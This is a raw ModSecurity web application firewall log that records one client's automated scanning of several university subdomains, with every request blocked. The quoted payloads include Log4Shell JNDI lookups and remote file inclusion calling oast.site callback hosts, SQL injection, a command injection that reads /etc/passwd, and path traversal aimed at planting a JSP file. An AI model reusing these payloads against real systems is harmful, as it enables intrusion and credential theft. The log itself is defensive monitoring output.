"/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQUIBYAAAA2"]
[Tue Aug 29 11:32:10.359591 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgfms5kqyctd45g.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQKOfEAAAAs"]
[Tue Aug 29 11:32:10.362597 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgmbi8x4crefz8m.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQUIBoAAAA2"]
[Tue Aug 29 11:32:10.362932 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgjzpkfwewdpfsj.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQnF8IAAAAF"]
[Tue Aug 29 11:32:10.364098 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgnpngzn6n53h85.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAP5mPIAAAAM"]
[Tue Aug 29 11:32:10.376830 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg5tbak93k5ajzb.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAANWgXsAAAAG"]
[Tue Aug 29 11:32:10.436687 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg1u7fnku6suo6b.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAANWgX4AAAAG"]
[Tue Aug 29 11:32:10.444428 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg5d9dw7rnog4bn.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQnF8YAAAAF"]
[Tue Aug 29 11:32:10.445743 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgts5iawhe1u49m.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQNwNMAAAAv"]
[Tue Aug 29 11:32:10.450084 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgkn9rdsrrypsce.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAN9sTAAAAAJ"]
[Tue Aug 29 11:32:10.452524 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgijoiepf74mdcu.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQUIB4AAAA2"]
[Tue Aug 29 11:32:11.307257 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgprcibuiufytqu.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10y8Co-f0AAANsAZIAAAAD"]
[Tue Aug 29 11:32:11.317406 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg7iefnqywoeeg6.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10y8Co-f0AAAQMr0AAAAAu"]
[Tue Aug 29 11:32:12.348218 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQ9H0EAAAAK"]
[Tue Aug 29 11:32:12.360803 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAANWgYMAAAAG"]
[Tue Aug 29 11:32:12.378951 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQ83QwAAAAI"]
[Tue Aug 29 11:32:12.386222 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQUICQAAAA2"]
[Tue Aug 29 11:32:12.402995 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAN9sTgAAAAJ"]
[Tue Aug 29 11:32:12.417021 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQnF8oAAAAF"]
[Tue Aug 29 11:32:13.311733 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg3uxw8sqidb61a.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg3uxw8sqidb61a.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAPDoCwAAAAP"]
[Tue Aug 29 11:32:13.311817 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQnF8sAAAAF"]
[Tue Aug 29 11:32:13.313405 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQV4UYAAAA3"]
[Tue Aug 29 11:32:13.317094 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQNwNsAAAAv"]
[Tue Aug 29 11:32:13.317147 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQOv7AAAAAw"]
[Tue Aug 29 11:32:13.335217 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgdb87rr9otxwei.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgdb87rr9otxwei.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQV4UcAAAA3"]
[Tue Aug 29 11:32:13.335717 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgmq4jk6xbh1r1e.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmq4jk6xbh1r1e.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAP8G4kAAAAV"]
[Tue Aug 29 11:32:13.338138 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg41bor4mq66cgn.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg41bor4mq66cgn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQ7NHYAAAAH"]
[Tue Aug 29 11:32:13.353293 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgwun8r454wg13u.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgwun8r454wg13u.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQMr0kAAAAu"]
[Tue Aug 29 11:32:13.360648 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQ7NHcAAAAH"]
[Tue Aug 29 11:32:13.381290 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgi6rrd5nnnmnci.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgi6rrd5nnnmnci.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQOv7MAAAAw"]
[Tue Aug 29 11:32:14.302995 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zsCo-f0AAAP5mQAAAAAM"]
[Tue Aug 29 11:32:14.581751 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10zsCo-f0AAAQnF9EAAAAF"]
[Tue Aug 29 11:32:15.308365 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQMr00AAAAu"]
[Tue Aug 29 11:32:15.309631 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQNwOIAAAAv"]
